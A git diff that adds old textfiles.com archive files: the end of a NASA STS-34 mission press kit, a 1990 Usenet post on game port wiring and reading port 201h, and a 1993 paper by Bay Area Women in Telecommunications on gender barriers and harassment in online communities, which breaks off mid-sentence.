+on-orbit processing and the effects of microgravity determined post +facto. + + The samples of polymeric materials being studied in the PM experiment +are thin films (25 microns or less) approximately 25 mm in diameter. The +samples are mounted between two infrared transparent windows in a +specially designed infrared cell that provides the capability of thermally +processing the samples to 200 degrees Celsius with a high degree of +thermal control. The samples are mounted on a carousel that allows them +to be positioned, one at a time, in the infrared beam where spectra may be +acquired. The GEM provides all carousel and sample cell control. The first +flight of PM will contain 17 samples. + + The PM experiment is being conducted by 3M's Space Research and +Applications Laboratory. Dr. Earl L. Cook is 3M's Payload Representative +and Mission Coordinator. Dr. Debra L. Wilfong is PM's Science Coordinator, +and James E. Steffen is the Hardware Coordinator. + + The PM experiment, a commercial development payload, is sponsored by +NASA's Office of Commercial Programs. The PM experiment will be 3M's +fifth space experiment and the first under the company's 10-year Joint +Endeavor Agreement with NASA for 62 flight experiment opportunities. +Previous 3M space experiments have studied organic crystal growth from +solution (DMOS/1 on mission STS 51-A and DMOS/2 on STS 61-B) and +organic thin film growth by physical vapor treatment (PVTOS/1 on STS +51-I and PVTOS/2 on mission STS-26). + + + + +STUDENT EXPERIMENT + +Zero Gravity Growth of Ice Crystals From Supercooled Water With Relation +To Temperature (SE82-15) + + This experiment, proposed by Tracy L. Peters, formerly of Ygnacio High +School, Concord, Calif., will observe the geometric ice crystal shapes +formed at supercooled temperatures, below 0 degrees Celsius, without the +influence of gravity. + + Liquid water has been discovered at temperatures far below water's +freezing point. This phonomenon occurs because liquid water does not +have a nucleus, or core, around which to form the crystal. When the ice +freezes at supercold temperatures, the ice takes on many geometric +shapes based on the hexagon. The shape of the crystal primarily depends +on the supercooled temperature and saturation of water vapor. The shapes +of crystals vary from simple plates to complex prismatic crystals. + + Many scientists have tried to determine the relation between +temperature and geometry, but gravity has deformed crystals, caused +convection currents in temperature-controlled apparatus, and caused + + + + + + +faults in the crystalline structure. These all affect crystal growth by +either rapid fluctuations of temperature or gravitational influence of the +crystal geometry. + +The results of this experiment could aid in the design of radiator cooling +and cryogenic systems and in the understanding of high-altitude +meteorology and planetary ring structure theories. + +Peters is now studying physics at the University of California at Berkeley. +His teacher advisor is James R. Cobb, Ygnacio High School; his sponsor is +Boeing Aerospace Corp., Seattle. + +Peters also was honored as the first four-time NASA award winner at the +International Science and Engineering Fair (ISEF), which recognizes +student's creative scientific endeavors in aerospace research. At the +1982 ISEF, Peters was one of two recipients of the Glen T. Seaborg Nobel +Prize Visit Award, an all-expense-paid visit to Stockholm to attend the +Nobel Prize ceremonies, for his project "Penetration and Diffusion of +Supersonic Fluid." + + + + +MESOSCALE LIGHTNING EXPERIMENT + + The Space Shuttle will again carry the Mesoscale Lightning Experiment +(MLE), designed to obtain nighttime images of lightning in order to better +understand the global distribution of lightning, the interrelationships +between lightning events in nearby storms, and relationships between +lightning, convective storms and precipitation. + + A better understanding of the relationships between lightning and +thunderstorm characteristics can lead to the development of applications +in severe storm warning and forecasting, and early warning systems for +lightning threats to life and property. + + In recent years, NASA has used both Space Shuttle missions and +high-altitude U-2 aircraft to observe lightning from above convective +storms. The objectives of these observations have been to determine +some of the baseline design requirements for a satellite-borne optical +lightning mapper sensor; study the overall optical and electrical +characteristics of lightning as viewed from above the cloudtop; and +investigate the relationship between storm electrical development and +the structure, dynamics and evolution of thunderstorms and thunderstorm +systems. + + The MLE began as an experiment to demonstrate that meaningful, +qualitative observations of lightning could be made from the Shuttle. +Having accomplished this, the experiment is now focusing on quantitative +measurements of lightning characteristics and observation simulations +for future space-based lightning sensors. + + Data from the MLE will provide information for the development of +observation simulations for an upcoming polar platform and Space Station + + + + + + +instrument, the Lightning Imaging Sensor (LIS). The lightning experiment +also will be helpful for designing procedures for using the Lightning +Mapper Sensor (LMS), planned for several geostationary platforms. + + In this experiment, Atlantis' payload bay camera will be pointed +directly below the orbiter to observe nighttime lightning in large, or +mesoscale, storm systems to gather global estimates of lightning as +observed from Shuttle altitudes. Scientists on the ground will analyze the +imagery for the frequency of lightning flashes in active storm clouds +within the camera's field of view, the length of lightning discharges, and +cloud brightness when illuminated by the lightning discharge within the +cloud. + + If time permits during missions, astronauts also will use a handheld +35mm camera to photograph lightning activity in storm systems not +directly below the Shuttle's orbital track. + + Data from the MLE will be associated with ongoing observations of +lightning made at several locations on the ground, including observations +made at facilities at the Marshall Space Flight Center, Huntsville, Ala.; +Kennedy Space Center, Fla.; and the NOAA Severe Storms Laboratory, +Norman, Okla. Other ground-based lightning detection systems in +Australia, South America and Africa will be intergrated when possible. + +The MLE is managed by the Marshall Space Flight Center. Otha H. Vaughan +Jr., is coordinating the experiment. Dr. Hugh Christian is the project +scientist, and Dr. James Arnold is the project manager. + + + + +IMAX + + The IMAX project is a collaboration between NASA and the Smithsonian +Institution's National Air and Space Museum to document significant space +activities using the IMAX film medium. This system, developed by the +IMAX Systems Corp., Toronto, Canada, uses specially designed 70mm film +cameras and projectors to record and display very high definition +large-screen color motion pictures. + + IMAX cameras previously have flown on Space Shuttle missions 41-C, +41-D and 41-G to document crew operations in the payload bay and the +orbiter's middeck and flight deck along with spectacular views of space +and Earth. + + Film from those missions form the basis for the IMAX production, "The +Dream is Alive." On STS 61-B, an IMAX camera mounted in the payload bay +recorded extravehicular activities in the EAS/ACCESS space construction +demonstrations. + + The IMAX camera, most recently carried aboard STS-29, will be used on +this mission to cover the deployment of the Galileo spacecraft and to +gather material on the use of observations of the Earth from space for +future IMAX films. + + + + + + + + + + +AIR FORCE MAUI OPTICAL SITE CALIBRATION TEST + + The Air Force Maui Optical Site (AMOS) tests allow ground-based +electro-optical sensors located on Mt. Haleakala, Maui, Hawaii, to collect +imagery and signature data of the orbiter during cooperative overflights. +Scientific observations made of the orbiter while performing Reaction +Control System thruster firings, water dumps or payload bay light +activation are used to support the calibration of the AMOS sensors and the +validation of spacecraft contamination models. AMOS tests have no +payload-unique flight hardware and only require that the orbiter be in +predefined attitude operations and lighting conditions. + + The AMOS facility was developed by Air Force Systems Command +(AFSC) through its Rome Air Development Center, Griffiss Air Force Base, +N.Y., and is administered and operated by the AVCO Everett Research +Laboratory, Maui. The principal investigator for the AMOS tests on the +Space Shuttle is from AFSC's Air Force Geophysics Laboratory, Hanscom +Air Force Base, Mass. A co-principal investigator is from AVCO. + + Flight planning and mission support activities for the AMOS test +opportunities are provided by a detachment of AFSC's Space Systems +Division at Johnson Space Center, Houston. Flight operations are +conducted at JSC Mission Control Center in coordination with the AMOS +facilities located in Hawaii. + + + + +SENSOR TECHNOLOGY EXPERIMENT + + The Sensor Technology Experiment (STEX) is a radiation detection +experiment designed to measure the natural radiation background. The +STEX is a self-contained experiment with its own power, sensor, computer +control and data storage. A calibration pack, composed of a small number +of passive threshold reaction monitors, is attached to the outside of the +STEX package. + + Sponsored by the Strategic Defense Initiative Organization, the STEX +package weighs approximately 50 pounds and is stowed in a standard +middeck locker throughout the flight. + + + + + + + + + + + + + + + + +PAYLOAD AND VEHICLE WEIGHTS + + Vehicle/Payload Weight (Pounds) + +Orbiter (Atlantis) Empty 172,018 + +Galileo/IUS (payload bay) 43,980 + +Galileo support hardware (middeck) 59 + +SSBUV (payload bay) 637 + +SSBUV support 578 + +DSO 49 + +DTO 170 + +GHCD 130 + +IMAX 269 + +MLE 15 + +PM 219 + +>SSIP 70 + +STEX 52 + +Orbiter and Cargo at SRB Ignition 264,775 + +Total Vehicle at SRB Ignition 4,523,810 + +Orbiter Landing Weight 195,283 + + + + + +SPACEFLIGHT TRACKING AND DATA NETWORK + + Primary communications for most activities on STS-34 will be +conducted through the orbiting Tracking and Data Relay Satellite System +(TDRSS), a constellation of three communications satellites in +geosynchronous orbit 22,300 miles above the Earth. In addition, three +NASA Spaceflight Tracking and Data Network (STDN) ground stations and +the NASA Communications Network (NASCOM), both managed by Goddard +Space Flight Center, Greenbelt, Md., will play key roles in the mission. + + Three stations -- Merritt Island and Ponce de Leon, Florida and the +Bermuda -- serve as the primary communications during the launch and +ascent phases of the mission. For the first 80 seconds, all voice, +telemetry and other communications from the Space Shuttle are relayed to + + + + + + +the mission managers at Kennedy and Johnson Space Centers by way of the +Merritt Island facility. + + At 80 seconds, the communications are picked up from the Shuttle and +relayed to the two NASA centers from the Ponce de Leon facility, 30 miles +north of the launch pad. This facility provides the communications +between the Shuttle and the centers for 70 seconds, or until 150 seconds +into the mission. This is during a critical period when exhaust from the +solid rocket motors "blocks out" the Merritt Island antennas. + + The Merritt Island facility resumes communications to and from the +Shuttle after those 70 seconds and maintains them until 6 minutes, 30 +seconds after launch when communications are "switched over" to +Bermuda. Bermuda then provides the communications until 11 minutes +after liftoff when the TDRS-East satellite acquires the Shuttle. +TDRS-West acquires the orbiter at launch plus 50 minutes. + + The TDRS-East and -West satellites will provide communications with +the Shuttle during 85 percent or better of each orbit. The TDRS-West +satellite will handle communications with the Shuttle during its descent +and landing phases. + + + + + + +STS-34 CARGO CONFIGURATION (illustration) + + + + + + + +CREW BIOGRAPHIES + + + Donald E. Williams, 47, Capt., USN, will serve as commander. Selected +as an astronaut in January 1978, he was born in Lafayette, Ind. + + Williams was pilot for STS-51D, the fourth flight of Discovery, +launched April 12, 1985. During the mission, the seven-member crew +deployed the Anik-C communications satellite for Telesat of Canada and +the Syncom IV-3 satellite for the U.S. Navy. A malfunction in the Syncom +spacecraft resulted in the first unscheduled extravehicular, rendezvous +and proximity operation for the Space Shuttle in an attempt to activate +the satellite. + + He graduated from Otterbein High School, Otterbein, Ind., in 1960 and +received his B.S. degree in mechanical engineering from Purdue University +in 1964. Williams completed his flight training at Pensacola, Fla., +Meridian, Miss., and Kingsville, Texas, and earned his wings in 1966. + + + + + + + + During the Vietnam Conflict, Williams completed 330 combat missions. +He has logged more than 5,400 hours flying time, including 5,100 in jets, +and 745 aircraft carrier landings. + + + + Michael J. McCulley, 46, Cdr., USN, will be pilot on this flight. Born in +San Diego, McCulley considers Livingston, Tenn., his hometown. He was +selected as a NASA astronaut in 1984. He is making his first Space +Shuttle flight. + + McCulley graduated from Livingston Academy in 1961. He received B.S. +and M.S. degrees in metallurgical engineering from Purdue University in +1970. + + After graduating from high school, McCulley enlisted in the U.S. Navy +and subsequently served on one diesel-powered and two nuclear-powered +submarines. Following flight training, he served tours of duty in A-4 and +A-65 aircraft and was selected to attend the Empire Test Pilots School in +Great Britain. He served in a variety of test pilot billets at the Naval Air +Test Center, Patuxent River, Md., before returning to sea duty on the USS +Saratoga and USS Nimitz. + + He has flown more than 50 types of aircraft, logging more than 4,760 +hours, and has almost 400 carrier landings on six aircraft carriers. + + + + Shannon W. Lucid, 46, will serve as mission specialist (MS-1) on this, +her second Shuttle flight. Born in Shanghai, China, she considers Bethany, +Okla., her hometown. Lucid is a member of the astronaut class of 1978. + + Lucid's first Shuttle mission was during STS 51-G, launched from the +Kennedy Space Center on June 17, 1985. During that flight, the crew +deployed communications satellites for Mexico, the Arab League and the +United States. + + Lucid graduated from Bethany High School in 1960. She then attended +the University of Oklahoma where she received a B.S. degree in chemistry +in 1963, an M.S. degree in biochemistry in 1970 and a Ph.D. in biochemistry +in 1973. + + Before joining NASA, Lucid held a variety of academic assignments +such as teaching assistant at the University of Oklahoma's department of +chemistry; senior laboratory technician at the Oklahoma Medical Research +Foundation; chemist at Kerr-McGee in Oklahoma City; graduate assistant in +the University of Oklahoma Health Science Center's department of +biochemistry; and molecular biology and research associate with the +Oklahoma Medical Research Foundation in Oklahoma City. Lucid also is a +commercial, instrument and multi-engine rated pilot. + + + + Franklin Chang-Diaz, 39, will serve as MS-2. Born in San Jose, Costa + + + + + + +Rica, Chang-Diaz also will be making his second flight since being +selected as an astronaut in 1980. + + Chang-Diaz made his first flight aboard Columbia on mission STS 61-C, +launched from KSC Jan. 12, 1986. During the 6-day flight he participated +in the deployment of the SATCOM KU satellite, conducted experiments in +astrophysics and operated the materials science laboratory, MSL-2. + + Chang-Diaz graduated from Colegio De La Salle, San Jose, Costa Rica, in +1967, and from Hartford High School, Hartford, Conn., in 1969. He received +a B.S. degree in mechanical engineering from the University of Connecticut +in 1973 and a Ph.D. in applied plasma physics from the Massachusetts +Institute of Technology in 1977. + + While attending the University of Connecticut, Chang-Diaz also worked +as a research assistant in the physics department and participated in the +design and construction of high-energy atomic collision experiments. +Upon entering graduate school at MIT, he became heavily involved in the +United State's controlled fusion program and conducted intensive research +in the design and operation of fusion reactors. In 1979, he developed a +novel concept to guide and target fuel pellets in an inertial fusion reactor +chamber. In 1983, he was appointed as visiting scientist with the MIT +Plasma Fusion Center which he visits periodically to continue his research +on advanced plasma rockets. + +Chang-Diaz has logged more than 1,500 hours of flight time, including +1,300 hours in jet aircraft. + + + + Ellen S. Baker, 36, will serve as MS-3. She will be making her first +Shuttle flight. Baker was born in Fayetteville, N.C., and was selected as +an astronaut in 1984. + + Baker graduated from Bayside High School, New York, N.Y., in 1970. She +received a B.A. degree in geology from the State University of New York at +Buffalo in 1974, and an M.D. from Cornell University in 1978. + + After medical school, Baker trained in internal medicine at the +University of Texas Health Science Center in San Antonio, Texas. In 1981, +she was certified by the American Board of Internal Medicine. + + Baker joined NASA as a medical officer at the Johnson Space Center in +1981 after completing her residency. That same year, she graduated with +honors from the Air Force Aerospace Medicine Primary Course at Brooks +Air Force Base in San Antonio. Prior to her selection as an astronaut, she +served as a physician in the Flight Medicine Clinic at JSC. + + + +NASA PROGRAM MANAGEMENT + + +NASA Headquarters + + + + + + +Washington, D.C. + +Richard H. Truly +NASA Administrator + +James R. Thompson Jr. +NASA Deputy Administrator + +William B. Lenoir +Acting Associate Administrator for Space Flight + +George W.S. Abbey +Deputy Associate Administrator for Space Flight + +Arnold D. Aldrich +Director, National Space Transportation Program + +Leonard S. Nicholson +Deputy Director, NSTS Program +(located at Johnson Space Center) + +Robert L. Crippen +Deputy Director, NSTS Operations +(located at Kennedy Space Center) + +David L. Winterhalter +Director, Systems Engineering and Analyses + +Gary E. Krier +Director, Operations Utilization + +Joseph B. Mahon +Deputy Associate Administrator +for Space Flight (Flight Systems) + +Charles R. Gunn +Director, Unmanned Launch Vehicles +and Upper Stages + +George A. Rodney +Associate Administrator for Safety, Reliability, +Maintainability and Quality Assurance + +Charles T. Force +Associate Administrator for Operations + +Dr. Lennard A. Fisk +Associate Administrator for Space Science +and Applications + +Samuel Keller +Assistant Deputy Associate Administrator +NASA Headquarters + + + + + + + +Al Diaz +Deputy Associate Administrator for +Space Science and Applications + +Dr. Geoffrey A. Briggs +Director, Solar System Exploration Division + +Robert F. Murray +Manager, Galileo Program + +Dr. Joseph Boyce +Galileo Program Scientist + + + +Johnson Space Center +Houston, Texas + +Aaron Cohen +Director + +Paul J. Weitz +Deputy Director + +Richard A. Colonna +Manager, Orbiter and GFE Projects + +Donald R. Puddy +Director, Flight Crew Operations + +Eugene F. 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Barthelme +SSBUV Mission Manager + \ No newline at end of file diff --git a/textfiles.com/computers/gameport.inf b/textfiles.com/computers/gameport.inf new file mode 100644 index 00000000..b1f2a172 --- /dev/null +++ b/textfiles.com/computers/gameport.inf @@ -0,0 +1,99 @@ + +From: bill@hpcvlx.cv.hp.com (Bill Frolik) +Newsgroups: comp.sys.ibm.pc +Subject: Re: How to read game port +Date: 6 Apr 90 17:47:16 GMT + +> 1) Is there anyone that can tell me the specifications for the game port +> connector? + + 15-pin D-shell connector: + + PIN SIGNAL PIN SIGNAL + --- ------ --- ------ + 1 +5V 8 +5V + 2 button 1 9 +5V + 3 stick 1 10 button 3 + 4 GND 11 stick 3 + 5 GND 12 GND + 6 stick 2 13 stick 4 + 7 button 2 14 button 4 + 15 +5V + + Game card has a female connector; + Joystick cable has male connector. + Joystick wiring: + + +5 ________________ + | + stick1 ________ | + | 100K | + _/\/\/\_____| + stick2 ________ | + | 100K | + _/\/\/\_____| + stick3 ________ | + | 100K | + _/\/\/\_____| + stick4 ________ | + | 100K | + _/\/\/\_____| + ___ + button1 ______o o_______ + ___ | + button2 ______o o_______| + ___ | + button3 ______o o_______| + ___ | + button4 ______o o_______| + | + GND ________________| + + +> 2) As near as I can figure, I have to use the inpw() function (I'm using +> C) to read the ports. Unfortunately, I don't know the port number to +> give the function to read the port. If this isn't the right/best way, +> please let me know. + + You need to do byte I/O to and from port 201h. + To read the joysticks (or your slide pot positions), you + must first write a byte to port 201h. It doesn't matter + what value you send, as long as you perform an I/O write. + This triggers the 558 timer on the game adapter. + + Game port 201h byte: + _______________________________________________________ + | 7 | 6 | 5 | 4 | 3 | 2 | 1 | 0 | + | but4 | but3 | but2 | but1 | stk4 | stk3 | stk2 | stk1 | + |______|______|______|______|______|______|______|______| + + The most machine-independent way to sample the game port + is to use a timer. Note the time (e.g., read the countdown + register in Timer 0, you need pretty fine resolution and this + timer performs 65535 counts every 55 ms) just before you + trigger the 558. After triggering, sit in a loop reading + port 201h and examining bits 0-3. For those bits that have + a joystick pot attached, you'll see them sit for a while at 0, + then become 1. As each bit flips back to 1, note the time + again. When all bit 0-3 have flipped back to 1, you're almost + done. Compute elapsed time for each bit, and you end up with + a value that is proportional to pot position. + + If you're lazy and don't care about machine independence, + you can just trigger the card, then sit in a loop and count + up from zero. As each bit flips back to 1, save the count + for that bit. I've seen a few games that probably use + this method. Problem is that if you then run the same code + on a faster/slower machine, your calibration can get very + easily messed up. + + Buttons can be read at any time just by reading port 201h + and looking at bits 4-7. No triggering is required. + Button bits are normally 1; while a button is depressed, + its bit will flip to 0. + +___________________________________________ + +Bill Frolik Hewlett-Packard Co. +hp-pcd!bill Corvallis, Oregon +bill@hpcvlx.cv.hp.com (503)750-4082 diff --git a/textfiles.com/computers/genderol b/textfiles.com/computers/genderol new file mode 100644 index 00000000..3cc3cc58 --- /dev/null +++ b/textfiles.com/computers/genderol @@ -0,0 +1,522 @@ + Gender Issues in Online Communications + + + + By + Hoai-An Truong + + with additional writing and editing + by Gail Williams, Judi Clark and Anna Couey + + in conjunction with + Members of BAWIT -- Bay Area Women in Telecommunications + + Copyright 1993 Written for CFP 93 Version 4.1 + + + + BAWIT ['bay-wit'], Bay Area Women in Telecommunications, is a group + of women working with telecom, organized to discuss women's + professional and social issues and computer networking, including + industry gender bias. By doing so, BAWIT seeks to advance the state + of women who use telecom, to provide a higher profile for women in + the industry, and to encourage women and girls in their exploration + of computers in general, and in particular, telecom. + + Signed by: Judi Clark, Anna Couey, Lile Elam, Barbara Enzer, Hilarie + Gardner, M Normal, Naomi Pierce, Nancy Rhine, Rita Rouvalis, Leslie + Regan Shade, Jillaine Smith, Hoai-An Truong, Sue vanHattum, Gail + Williams, Donna Zelzer. + + + The principal author would like to acknowledge members of BAWIT, and + Mills College for education on the issues discussed in this paper, + and also Judi Clark, who proposed the panel on gender issues and was + instrumental in getting the paper off the ground and throughout the + process. + + Contact information for Bay Area Women in Telecom + e-mail: bawit-request@igc.apc.org + + + Introduction + + Despite the fact that computer networking systems obscure physical + characteristics, many women find that gender follows them into the + online community, and sets a tone for their public and private + interactions there -- to such an extent that some women purposefully + choose gender neutral identities, or refrain from expressing their + opinions. + + The experiences of women online are both personal and political. To a + certain extent, their causes are rooted in the physical world -- + economics and social conditioning contribute to the limited numbers + of women online. Additionally, online environments are largely + determined by the viewpoints of their users and programmers, still + predominantly white men. + + If network policies and legislation are going to determine access to + information and participation in public media for this and the next + generations, it is critical that they reflect and address the + perspectives of women and people of color, to avoid further + marginalization of these constituencies. The following is an + overview of issues which members of BAWIT feel need to be addressed. + We feel that these are situations worthy of further investigation and + research. + + Access + + The Clinton administration has placed a priority on developing a + National Information Infrastructure, envisioning that computer + networks will be the information highways of the future. However, on + many systems, women comprise between 10 and 15 percent of the online + population. On electronic bulletin boards or BBSs, which are rarely + as supervised or monitored as the more well-known online services -- + such as Compuserve, America_nline and Prodigy -- their numbers tend + to be far lower. Why? And what are the implications of inequities in + gender representation in the information infrastructure? + + It is likely that economics impact women's online participation to a + large degree. On average, women's salaries are 40% lower than men's, + leaving women with less disposable income for computers, modems, + software, online services and any additional phone charges. + +While electronic mail [or e-mail] is fast becoming common in the + workplace, it is still predominantly used by those in technical + fields, whether in educational institutions or in business; or by + those with technical facility or training. Men who use the Internet + have a higher likelihood of being in an academic, management, or + technical position offering free access as one of the prerequisites + of their jobs. Thus, a higher percentage of men have both the + technical training and subsidized access to participate online than + women do. + + Additional deterrents to online participation may be attributed to + women's roles in society. While more women are in the workplace, they + often are still primary caretakers for their children, and in a + majority of households, women bear the brunt of household chores. + Women may find they have less free time to learn to navigate online + systems. + + Women in Computer Studies + + Another deterrent to women's entering the computer field or making + themselves at home on the net is the negative stereotype of the + socially isolated computer nerd. Women may need help overcoming + visions of becoming or associating with technology-obsessed nerds and + adolescents who are seen as likely to populate online systems. This + has had research attention as a significant reason why females + students tend to drop out of computer studies. + + Professors tend to call upon and address their remarks to male + students more often than female students, as several studies show. + Additionally, there are few opportunities for women to be mentored in + higher education or in their careers. Executives or professors -- + often male -- are likely to identify with, encourage and mentor + another male, rather than a female. By itself, lack of attention or + mentors may not be a deterrent; however, coupled with other social + factors and discrimination, it often contributes to feelings of + discouragement and isolation, low confidence and feelings of + unworthiness, and higher dropout rates. + + Despite the fact that women often use computers in business settings, + technical roles -- from programming of telecom software to operating + communications systems -- remain predominantly male. Invitations to + sysop gatherings addressed "Dear Sir" and including "your wife is + welcome," customers who ask for a manager when they hear a female + voice on a technical help call, and the popular culture archetypes of + computer enthusiasts as male, are continual reminders of common + assumptions based on gender. Even when female students do as well or + better than their male peers, they tend to feel less competent. In + technical fields, the common assumption by both men and by women + themselves is that women don't do as well as men. Women are then less + likely to take on projects which may either prove their ability or + provide additional expertise, because they don't feel qualified. + + Interface + + Access to online communications is not simply a function of + economics. The technical expertise required to establish access to + online systems, and the interfaces users encounter when they get + there can be significant deterrents to online participation for + non-technical users. While graphical user interfaces can + significantly ameliorate this problem, they are system specific, a + situation which can hamper access for small or $community + organizations and lower income individuals who can only afford older + and non-standard equipment, if at all. + + Studies have attempted to explain the reasons that fewer girls than + boys pursue technical fields. Some studies indicate that gender + impacts perception. Network interfaces are typically designed by men; + if the studies are correct, it would appear that developing + interfaces that rely on women's perceptive skills in addition to + men's would impact online participation. Interestingly enough, Les + Radke, who teaches a computer class at Richmond High, finds that in + his class boys gravitate towards computer games, while girls use + e-mail and read USENET. + + Perceived Usefulness + + An even greater deterrent for non-technical users is the perception + of usefulness. As BAWIT member Donna Zelzer explains: "...Look at the + automobile. It's expensive, it's mechanical... And, if you make a + mistake, you can KILL someone. And of course men make fun of women + drivers all the time. Yet despite these obstacles, millions of women + own cars and drive them every day. Why? Because they see cars as + useful and even necessary to their lifestyles. But most women don't + feel this way about computers or going online." + + Network systems and projects geared to serving non-technical users + find that education is a tremendous part of their work, and that + concrete benefits must be demonstrated to overcome a new user's + investment of time and money to learn to telecommunicate. And what + are the benefits? Network users often describe virtual community as a + benefit of being online; professionals and activists find they can + gather, access, and disseminate information and viewpoints not + readily available from mass media. Yet while the networks can + democratize publishing, they also impose additional cost on + information. Herbert Schiller's "Culture, Inc.," among information + and space. As the nets become increasingly commercialized, they + further establish class differentiation between those who can afford + the luxury of participating in online systems and those who cannot. + + Social Interaction and Gender-Based Perceptions + + A newly created bulletin board in the Bay Area started up a + conference with a posting comparing women to pets that occasionally + need to be put to sleep. This type of demeaning communication + involving women is quite typical of bulletin boards, which may + provide an outlet for males to share humor they would suppress in a + mixed setting. This can be a disincentive to participate, especially + if this is an initial or persistent online experience. + + People will say things online that they will not say face to face. In + addition, missing elements of conversation, such as facial + expression, vocal clues, and other conventions have a complex effect + on online interactions. Additionally there are unresolved + difficulties in the frank discussion and expression of sexuality + between men and women, in which intent is often misunderstood. + + An element of this technology is a tradition of sometimes colorful + diatribes or "flaming". Since women tend to use language differently + then men do, these highly aggressive language patterns may be even + more of a barrier to our participation. Styles of communication + (sometimes referred to as "debate" and "relate" styles) often + complicate messages. While debating and arguing an issue is the + normal style for some people, others understand these debates as an + attack on them, causing them to pull away from the discussion. Being + sensitive to the style of communication can be as important as the + actual message being conveyed. + + Deborah Tannen, among other authors and researchers, describes the + difference in language use between the genders and between different + families and cultures. Tannen identifies a less direct, more + inclusive style, designed to avoid arguments and confrontation, as a + more typically female method of communication. + + Online Harassment + + Many women who use Internet sites, electronic bulletin boards or + other online services, or even internal company-wide networks report + receiving invitations and messages of a sexually explicit nature in + real-time "chats" or via e-mail. These messages are variously + analogous to obscene phone calls or whistles in the street depending + on their tone. However, they take on an added annoyance factor for + women who are paying to utilize the resources of the online + environment. Additionally, these messages may be experienced + repeatedly by the same women because there tend to be fewer women on + most systems. Women looking for information online are often + surprised to see that a female first name can bring a distracting and + ultimately expensive volume of unsolicited contact, and give one the + sensation of being the first female to have arrived at a frontier + since pay dirt was struck. The problem is pervasive and annoying + enough that many women choose to switch to non-gender-specific login + names, for example, or to post to women-only conferences or mailing + lists. + + A major obstacle that women have to deal with is that sexual + harassment is a relatively new concept in our society, and that + ignoring the situation can be a successful survival strategy in the + short run. Women may refrain from reporting perceptions of abuse + because of internalized peer pressure, based on observations of other + women being labeled "prudes" or otherwise mocked. Or they may hold + back due to the fear, or anecdotal evidence that charges are not + likely to be taken seriously by management. Women may not know that + harassment is by its very nature subjective, and that they may be + entitled to more privacy than they get. + + "All of the cases I have seen filed involving e-mail or voice mail + were settled out of court, which says something about the strength of + the evidence," said Frieda Klein, a sexual harassment consultant, in + an article in MacWeek dated Dec. 14, 1992. + + Guidelines for Monitoring Online Harassment + + How can we prevent online harassment? The best way to bring this + about is education on the issues and recognizing when harassment + occurs. A MUSE role-playing community, Cyberion City at MIT, tries to + educate its participants with this definition of the problem: + + "Unwanted advances of hostile or forward nature are unacceptable... + If you think someone might be interested in developing a closer + personal relationship, it is your responsibility to make absolutely + sure of this before saying or doing anything that would be considered + inappropriate in real life. Such inappropriate behavior includes, but + is not limited to, suggestive remarks; violation of the other + person's space; forward, intimate or suggestive conduct." + +"People on this system are of all ages and backgrounds... Most are not + here specifically to form intimate relationships, and it is + inappropriate to assume that someone is so interested unless you have + received clear indications of it. If you are unsure whether your + behavior is appropriate, STOP, and ASK. Many people are hesitant to + say 'go away' in so many words because they do not wish to be rude. + It is your responsibility to make sure they are saying 'yes' before + pursuing a close personal relationship." + + Virtual or online harassment does not have a distinct legal + definition. Case law has not yet been established for many + situations, but preexisting harassment and stalking laws may be used + as guidelines. MacWeek, an industry publication, suggests the + following: + + "Companies should print guidelines prohibiting sexual harassment and + distribute them to all employees. Those guidelines should be followed + up with training." + + "The courts have held that sexually explicit posters hung on walls + can create a hostile work environment. Similarly, pornographic + computer programs or screen displays, particularly if visible to + passers-by, could constitute sexual harassment." "Managers should + treat any complaints of sexual harassment seriously. The company + should have clearly enunciated policy of progressive discipline, + ranging from warnings to terminations, depending on the severity of + the offense." + + "After receiving complaints, managers and personnel departments + immediately should seek to stop the harassment and educate the + employees involved. A company is forbidden by law to retaliate + against anyone making a sexual-harassment complaint." + + A company, including the network manager, may be held responsible if + harassment occurs or continues to occur in the office. We would do + well to find personal definitions in order to identify and address + problems which arise. It is vital that company managers educate + themselves and their employees, and have a anti-harassment policy + that includes online harassment. Awareness of the issue is the best + deterrent. + + Increasing Our Participation: Possible Approaches, Future Directions + + In the wake of the Anita Hill-Clarence Thomas hearings, companies and + individuals are beginning to address women's issues in a variety of + ways. A Silicon Valley company recently arranged an all-day retreat + offsite for its women employees to discuss gender issues faced by + women in the computer industry and within the company. Issues + discussed included glass ceilings, differences in pay, percentage of + women working at the company, how to achieve success in technical + fields, and dealing with career and home lives. The dialog continues. + + Across the bay, Berkeley Mac Women, a women's Macintosh users group, + formed completely independently within weeks of the creation of + BAWIT. At meetings, the all-women format has proven to be a more + comfortable environment for women computer users to ask questions. + + Stacy Horn, who runs Echo BBS, wanted to ensure that the board be + gender-balanced. Using affirmative action efforts such as telecom + tutorials, outreach for women, and creating an environment that women + would feel more comfortable in, she brought the number of women users + up to about 50 percent. Seniornet, an online network of senior + citizens has about a 50-50 ratio of women to men. Online services + which stress community such as Seniornet, Echo and the WELL (the WELL + has between 15-20% women users) attract higher numbers of women. + +Women banded together to support one another on Santa Monica PEN, a + city system. This account is from an article called "What's Really + Happening in Santa Monica" in the December issue of IMPACT! from the + Boston Computer Society Social Impact Group and Public Service + Committee, by Pamela Varley: + + "PENners quickly discover[ed] that they must contend with people who + feel entitled to hector mercilessly those with whom they + disagree....When the system started up, women -- who were greatly + outnumbered by men -- had problems with harassment....By the summer + of 1989, the few women on line were fed up and ready to drop out." + + "In response to harassment,...the women on PEN banded together in + July 1989 to form a support group called PEN Femmes. The group makes + a point of welcoming women when they begin to participate in PEN + conferences. Harassment has subsided as more women have become + active in conferences." + + System interfaces need to be evaluated in terms of user preferences. + Since research indicates that women tend to learn and navigate + somewhat differently than men, increased participation of women as + software and system interface designers is an important goal. + +Simpler interfaces are of benefit to all users, but especially to + those without technical training. As the BMUG BBS switched to using a + simpler electronic messaging system with a Mac-like interface, + enthusiastic users genezFted four times the number of messages as on + the old BBS. The familiarity of the new interface attracts women Mac + users both with and without technical backgrounds who never or rarely + used the old one. + + Rita Rouvalis, a BAWIT member, observes that "a list of Net + Celebrities I saw recently included only *3* women -- none of them + for technical merit. Anita Borg, who runs the Systers [electronic + mailing] list, was not included. When I was taking computer science + courses in college, I knew that Niklaus Wirth wrote Pascal and + Modula2 and 3, and that Kernigie and Richie developed C -- but I had + no *idea* that Grace Hopper [inventor of COBOL] existed until her + death." Remembering women pioneers is one way to transform the + stereotypes of computer innovators. + + Managers of communications networks and BBSs have many strategies to + try in making women welcome. Employing women as technical support + staff, or in other informed customer service roles, and encouraging + women to volunteer information to one another can help to take some + of the challenge out of learning a new set of skills. Special + approaches such as women-only tutorials, information campaigns and + rate subsidies are tools which may help systems approach a gender + balance. + + Conclusion + + How we address the issue of barriers to wider participation of women + has long-ranging 